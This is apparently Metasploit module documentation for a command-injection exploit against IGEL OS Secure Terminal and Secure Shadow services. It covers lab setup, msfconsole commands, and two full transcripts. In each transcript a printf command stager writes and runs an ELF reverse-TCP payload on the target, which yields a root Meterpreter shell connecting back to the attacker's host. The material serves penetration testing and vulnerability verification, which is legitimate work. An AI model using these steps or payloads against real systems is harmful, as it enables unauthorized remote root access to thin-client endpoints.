## Vulnerable Application

IGEL OS before 11.04.270 and 10.06.220 are vulnerable to remote command execution into a `system()` call via Secure Terminal and Secure
Shadow services.

Secure Terminal/telnet_ssl_connector:   30022/tcp
Secure Shadow/vnc_ssl_connector:        5900/tcp


## Verification Steps

Download Vulnerable IGEL OS version (e.g. 11.04.130) from: https://www.igel.com/software-downloads/workspace-edition/.

Unpack downloaded zip file and create a VM using the included .iso.

Navigate through the installation menus to install the firmware, reboot when prompted

After rebooted work through the presented configuration wizard.  In the Activation section use the starter license (selected by default).
Skip the ICG Agent Setup.  Upon completion the system will reboot again.

### Turn on vulnerable services

1. Click on the launcher menu
2. Click on the gear icon
3. Select "Setup" from the Application menu to launch the Setup app
4. Enable vulnerable VNC service wrapper
    1. Under the configuration menu on the left Navigate to: System > Remote Access > Shadow.
    2. Ensure "Allow remote shadowing" and "Secure mode" are checked.
5. Enable vulnerable terminal wrapper
    1. Under the configuration menu on the left Navigate to: System > Remote Access > Secure Terminal.
    2. Ensure "Secure Terminal" is checked.

### Exploitation

1. start msfconsole
2. `use exploit/linux/misc/igel_command_injection`
3. `set RHOST [TARGET IP]`
4. `set RPORT [30022 or 5900]`
5. `set LHOST [LOCAL IP]`
6. `exploit`

### Misc

To obtain the IGEL's IP address to test against click the up/down arrows on the right side of the task bar then click "More Details".
A shell is available on a virtual console by ctrl+alt+F11, switch back to the GUI with ctrl+alt+F1.

This module has been successfully tested against IGEL OS 11.04.130 and 10.05.500.

## Options

## Scenarios

### IGEL OS 11.04.130

Targeting the Secure Terminal service (30022/tcp):

```
msf > use exploit/linux/misc/igel_command_injection
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/misc/igel_command_injection) > set rhost 192.168.37.133
rhost => 192.168.37.133
msf exploit(linux/misc/igel_command_injection) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf exploit(linux/misc/igel_command_injection) > set verbose true
verbose => true
msf exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] 192.168.37.133:30022 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.37.133:30022 - IGEL OS Version: 11.04.130.01
[+] 192.168.37.133:30022 - The target appears to be vulnerable.
[*] 192.168.37.133:30022 - Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0'>>/tmp/oNwdw", "printf '\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\355\\0\\0\\0\\206\\1\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0\\152\\2\\130\\315\\200\\205\\300\\164\\6\\61\\300\\260\\1\\315\\200\\152\\2'>>/tmp/oNwdw", "printf '\\130\\315\\200\\205\\300\\164\\6\\61\\300\\260\\1\\315\\200\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150'>>/tmp/oNwdw", "printf '\\300\\250\\45\\1\\150\\2\\0\\21\\134\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152'>>/tmp/oNwdw", "printf '\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300'>>/tmp/oNwdw", "printf '\\170\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/oNwdw", "chmod +x /tmp/oNwdw", "/tmp/oNwdw", "rm -f /tmp/oNwdw"]
[*] 192.168.37.133:30022 - executing: printf '\177\105\114\106\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\124\200\4\10\64\0\0\0\0\0\0\0\0\0\0\0\64\0\40\0\1\0\0\0\0\0\0\0\1\0\0\0'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  16.45% done (149/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\0\0\0\0\0\200\4\10\0\200\4\10\355\0\0\0\206\1\0\0\7\0\0\0\0\20\0\0\152\2\130\315\200\205\300\164\6\61\300\260\1\315\200\152\2'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  32.67% done (296/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\130\315\200\205\300\164\6\61\300\260\1\315\200\152\12\136\61\333\367\343\123\103\123\152\2\260\146\211\341\315\200\227\133\150'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  49.01% done (444/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\300\250\45\1\150\2\0\21\134\211\341\152\146\130\120\121\127\211\341\103\315\200\205\300\171\31\116\164\75\150\242\0\0\0\130\152'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  65.45% done (593/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\0\152\5\211\343\61\311\315\200\205\300\171\275\353\47\262\7\271\0\20\0\0\211\343\301\353\14\301\343\14\260\175\315\200\205\300'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  81.79% done (741/906 bytes)
[*] 192.168.37.133:30022 - executing: printf '\170\20\133\211\341\231\262\152\260\3\315\200\205\300\170\2\377\341\270\1\0\0\0\273\1\0\0\0\315\200'>>/tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  95.03% done (861/906 bytes)
[*] 192.168.37.133:30022 - executing: chmod +x /tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress -  97.13% done (880/906 bytes)
[*] 192.168.37.133:30022 - executing: /tmp/oNwdw
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 192.168.37.133
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.133:50500) at 2021-04-30 15:33:12 -0500
[*] 192.168.37.133:30022 - Command Stager progress -  98.23% done (890/906 bytes)
[*] 192.168.37.133:30022 - executing: rm -f /tmp/oNwdw
[*] 192.168.37.133:30022 - Command Stager progress - 100.00% done (906/906 bytes)

meterpreter > getuid
Server username: root @ ITC000C29EB2C06 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : ITC000C29EB2C06.LOCALDOMAIN
OS           : IGEL V11 (Linux 5.4.48)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
```

### IGEL OS 11.04.130

Targeting the Secure Shadowing service (5900/tcp):

```
msf exploit(linux/misc/igel_command_injection) > set target 1
target => 1
msf exploit(linux/misc/igel_command_injection) > options

Module options (exploit/linux/misc/igel_command_injection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.37.133   yes       The target host(s), range CIDR identifier, or hosts file with synt
                                       ax 'file:<path>'
   RPORT    5900             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                       address on the local machine or 0.0.0.0 to listen on all addresses
                                       .
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Secure Shadow Service


msf exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] 192.168.37.133:5900 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.37.133:5900 - IGEL OS Version: 11.04.130.01
[+] 192.168.37.133:5900 - The target appears to be vulnerable.
[*] 192.168.37.133:5900 - Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0'>>/tmp/SVRVj", "printf '\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\355\\0\\0\\0\\206\\1\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0\\152\\2\\130\\315\\200\\205\\300\\164\\6\\61\\300\\260\\1\\315\\200\\152\\2'>>/tmp/SVRVj", "printf '\\130\\315\\200\\205\\300\\164\\6\\61\\300\\260\\1\\315\\200\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150'>>/tmp/SVRVj", "printf '\\300\\250\\45\\1\\150\\2\\0\\21\\134\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152'>>/tmp/SVRVj", "printf '\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300'>>/tmp/SVRVj", "printf '\\170\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/SVRVj", "chmod +x /tmp/SVRVj", "/tmp/SVRVj", "rm -f /tmp/SVRVj"]
[*] 192.168.37.133:5900 - executing: printf '\177\105\114\106\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\124\200\4\10\64\0\0\0\0\0\0\0\0\0\0\0\64\0\40\0\1\0\0\0\0\0\0\0\1\0\0\0'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  16.45% done (149/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\0\0\0\0\0\200\4\10\0\200\4\10\355\0\0\0\206\1\0\0\7\0\0\0\0\20\0\0\152\2\130\315\200\205\300\164\6\61\300\260\1\315\200\152\2'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  32.67% done (296/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\130\315\200\205\300\164\6\61\300\260\1\315\200\152\12\136\61\333\367\343\123\103\123\152\2\260\146\211\341\315\200\227\133\150'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  49.01% done (444/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\300\250\45\1\150\2\0\21\134\211\341\152\146\130\120\121\127\211\341\103\315\200\205\300\171\31\116\164\75\150\242\0\0\0\130\152'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  65.45% done (593/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\0\152\5\211\343\61\311\315\200\205\300\171\275\353\47\262\7\271\0\20\0\0\211\343\301\353\14\301\343\14\260\175\315\200\205\300'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  81.79% done (741/906 bytes)
[*] 192.168.37.133:5900 - executing: printf '\170\20\133\211\341\231\262\152\260\3\315\200\205\300\170\2\377\341\270\1\0\0\0\273\1\0\0\0\315\200'>>/tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  95.03% done (861/906 bytes)
[*] 192.168.37.133:5900 - executing: chmod +x /tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress -  97.13% done (880/906 bytes)
[*] 192.168.37.133:5900 - executing: /tmp/SVRVj
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 192.168.37.133
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.133:50502) at 2021-04-30 15:34:22 -0500
[*] 192.168.37.133:5900 - Command Stager progress -  98.23% done (890/906 bytes)
[*] 192.168.37.133:5900 - executing: rm -f /tmp/SVRVj
[*] 192.168.37.133:5900 - Command Stager progress - 100.00% done (906/906 bytes)

meterpreter > getuid
Server username: root @ ITC000C29EB2C06 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : ITC000C29EB2C06.LOCALDOMAIN
OS           : IGEL V11 (Linux 5.4.48)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
```
